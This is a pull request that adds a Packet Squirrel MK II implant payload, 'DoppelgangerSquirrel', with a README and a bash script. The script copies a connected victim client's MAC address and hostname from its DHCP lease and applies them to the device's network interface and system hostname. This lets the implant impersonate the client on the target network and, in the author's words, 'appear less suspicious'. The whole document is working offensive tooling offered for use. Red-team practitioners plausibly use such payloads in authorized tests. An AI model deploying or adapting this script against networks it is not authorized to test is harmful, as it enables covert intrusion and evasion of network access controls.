### PR TITLE
Added DoppelgangerSquirrel

### DIFF
--- a/payloads/general/DoppelgangerSquirrel/README.md
+++ b/payloads/general/DoppelgangerSquirrel/README.md
@@ -1,0 +1,29 @@
+# DoppelgangerSquirrel
+#### Author: 0i41E
+#### Version: 1.0
+
+**DoppelgangerSquirrel** is a payload designed for the [Packet Squirrel MK II](https://shop.hak5.org/products/packet-squirrel-mark-ii) to impersonate a client system within a network, similar to the MK I's [`NETMODE CLONE`](https://docs.hak5.org/packet-squirrel/payload-development/the-netmode-command/#netmode-clone).
+It clones the clients hostname and MAC address, which then get presented to the target network. 
+
+## Preperation
+Similar to `NETMODE CLONE`, the Packet Squirrel clones the MAC address, as well as hostname, of the target device from its Ethernet IN port ([Target Port](https://docs.hak5.org/packet-squirrel-mk-ii/getting-started/packet-squirrel-basics/#target-port)). Before connecting the cable to the target network via the Ethernet OUT port ([Network Port](https://docs.hak5.org/packet-squirrel-mk-ii/getting-started/packet-squirrel-basics/#network-port)), it is recommended to wait until the payload has finished. The Packet Squirrel will indicate successfull cloning by a blinking green LED, which turns off afterwards.
+
+#### Setup
+- Disconnect the target client from its network.
+- Connect Squirrel to target client via Target Port
+
+Afterwards, powerup the squirrel, let it boot and run the payload. After the LED blinks green, it'll turn off the LED, indicating that you now can insert the cable of the target network into the Network Port. 
+
+#### LED Status (After boot)
+- Cyan LED (LED SPECIAL2): Payload Start
+- Magenta (LED SETUP): Netmode started, beginning DHCP Lease loop
+- Yellow (LED STAGE3): Running loop to extract hostname and MAC address from DHCP lease
+- BLUE (LED B FAST): Loop successfully finished
+- Green (LED G Blinking): Followed by LED OFF, indicates success
+- RED: Error
+
+### Good to know
+- Even though this payload performs a backup, be aware that `NETMODE NAT` gets modified
+- Be aware that the target client sits within the Squirrels subnet, resulting in a different IP-address
+- Resolving internal hostnames from the target network will likely fail
+- Inserting the network cable into the Network Port before the payload has finished, may expose the Squirrel - be warned.

--- a/payloads/general/DoppelgangerSquirrel/payload
+++ b/payloads/general/DoppelgangerSquirrel/payload
@@ -1,0 +1,90 @@
+#!/bin/bash
+
+# Title:        DoppelgangerSquirrel
+# Author:       0i41E
+# Version:	1.0
+# Description: 	Spoof your targets hostname and MAC address to appear less suspicious to the target network.
+#
+# Usage: Power up your squirrel while your target client is attached. After the LED blinks green and shortly after shuts itself off, you successfully became the client, by connecting to the target network.
+
+LED SPECIAL2 
+
+# Define the network interface and the file with DHCP leases, as well as NETMODE paths
+# eth0 usually is connected to the target network, while eth1 is meant to be connected to the client
+NETWORK_INTERFACE="eth0"
+LEASES_FILE="/tmp/dhcp.leases"
+NAT_CONFIG="/usr/lib/network_config/nat"
+NAT_BACKUP="/usr/lib/network_config/nat_backup"
+
+# Backup original NAT config
+if [ ! -f "$NAT_BACKUP" ]; then
+    cp "$NAT_CONFIG" "$NAT_BACKUP"
+fi
+
+# Restore from clean base - just in case
+cp "$NAT_BACKUP" "$NAT_CONFIG"
+
+# Force WAN (eth0) to NOT auto start, isolating the client, while not exposing the squirrel to the network (Not 100% safe though - so better wait for payload has finsished)
+sed -i "/config interface 'wan'/,/config interface/ {
+    /option proto 'dhcp'/a \        option auto '0'
+}" "$NAT_CONFIG"
+
+
+# Set Network mode - modified NAT
+NETMODE NAT
+LED SETUP
+
+# Define loop time for DHCP lease
+WAIT_TIME=60
+ELAPSED=0
+
+#Wait for DHCP lease in a loop to get client info
+while [ $ELAPSED -lt $WAIT_TIME ]; do
+    if [ -s "$LEASES_FILE" ]; then
+        LAST_LEASE=$(tail -n 1 "$LEASES_FILE")
+        MAC_ADDRESS=$(echo "$LAST_LEASE" | awk '{print $2}')
+        HOSTNAME=$(echo "$LAST_LEASE" | awk '{print $4}')
+
+        if [ -n "$MAC_ADDRESS" ] && [ -n "$HOSTNAME" ]; then
+            break
+        fi
+    fi
+
+    LED STAGE3
+    sleep 1
+    ELAPSED=$((ELAPSED + 1))
+done
+
+# Validate DHCP Lease extraction
+if [ -z "$MAC_ADDRESS" ] || [ -z "$HOSTNAME" ]; then
+    LED R BLINKING
+    sleep 2
+    LED R SOLID
+    exit 1
+fi
+
+LED B FAST
+
+# Change MAC address of the eth0 to mimic target client
+ifconfig "$NETWORK_INTERFACE" hw ether "$MAC_ADDRESS"
+
+# Remove 'option auto 0' so eth0 can start normally
+sed -i "/config interface 'wan'/,/config interface/ {
+    /option auto '0'/d
+}" "$NAT_CONFIG"
+
+# Insert MAC after 'option proto dhcp' inside WAN block
+sed -i "/config interface 'wan'/,/config interface/ {
+    /option proto 'dhcp'/a \        option macaddr '$MAC_ADDRESS'
+}" "$NAT_CONFIG"
+
+## Change the system hostname using uci
+uci set system.@system[0].hostname="$HOSTNAME"
+uci commit system
+
+#Rerun modified NAT mode
+NETMODE NAT
+
+LED G BLINKING
+sleep 5
+LED OFF


### PR DESCRIPTION
A payload to impersonate a target client within the target network, by extracting client info from DHCP lease and modifing the Squirrels hostname, as well as MAC address.